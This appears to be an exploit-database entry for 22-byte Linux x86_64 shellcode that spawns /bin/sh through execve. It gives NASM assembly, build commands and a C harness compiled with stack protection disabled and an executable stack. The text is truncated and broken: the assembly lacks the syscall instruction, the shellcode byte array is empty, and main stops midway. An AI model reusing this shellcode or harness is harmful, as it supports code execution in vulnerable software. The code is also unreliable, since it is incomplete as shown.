Title: Linux/x86_64 - execve(/bin/sh) (22 bytes)
;Author: Aron Mihaljevic
;Architecture: Linux x86_64
;Shellcode Length:  22 bytes
;github =	

global _start

section .text


	;int execve(const char *filename, char *const argv[],char *const envp[])
	xor 	rsi,	rsi			;clear rsi
	push	rsi				;push null on the stack
	mov 	rdi,	0x68732f2f6e69622f	 ;/bin//sh in reverse order
	push	rdi
	push	rsp		
	pop	rdi				;stack pointer to /bin//sh
	mov 	al,	59			;sys_execve
	cdq					;sign extend of eax

=======Generate Shellcode==========================================
nasm -felf64 spawn_shell.nasm -o spawn_shell.o 
ld spawn_shell.o -o spawn_shell

=========generate C program to exploit=============================
gcc -fno-stack-protector -z execstack shell.c -o shell

#include <stdio.h>
#include <string.h>

unsigned char code[]= \
int main(){

        printf("length of your shellcode is: %d\n", (int)strlen(code));

        int (*ret)() = (int(*)())code;


# [2019-06-19]  #